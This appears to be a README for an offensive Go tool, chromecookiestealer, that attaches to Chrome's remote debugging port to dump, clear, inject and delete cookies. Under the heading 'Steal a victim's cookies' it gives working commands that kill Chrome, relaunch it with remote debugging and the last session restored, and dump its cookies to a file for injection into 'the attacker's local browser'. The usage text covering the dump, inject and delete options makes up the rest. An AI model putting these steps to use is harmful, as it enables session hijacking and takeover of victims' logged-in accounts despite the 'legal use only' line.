Cookies are dumped as JSON objects using Chrome’s own format. The same format is used for cookies to be loaded.
For legal use only.
Dump Chrome’s cookies
Inject dumped Cookies into (another instance of) Chrome
Clear Chrome’s cookies
Defaults settable at compile time
Steal a victim’s cookies:
git clone
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json
Inject into the attacker’s local browser:
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:
- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies
Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:
name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain
and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path.
Filenames may also be "-" for stdin/stdout.
-chrome URL
Chrome remote debugging URL (default "ws://")
Clear browser cookies
-delete file
Name of file containing parameters for cookies to delete
-dump file
Name of file to which to dump stolen cookies
-inject file
Name of file containing cookies to inject
Don't print a summary on exit
Enable verbose logging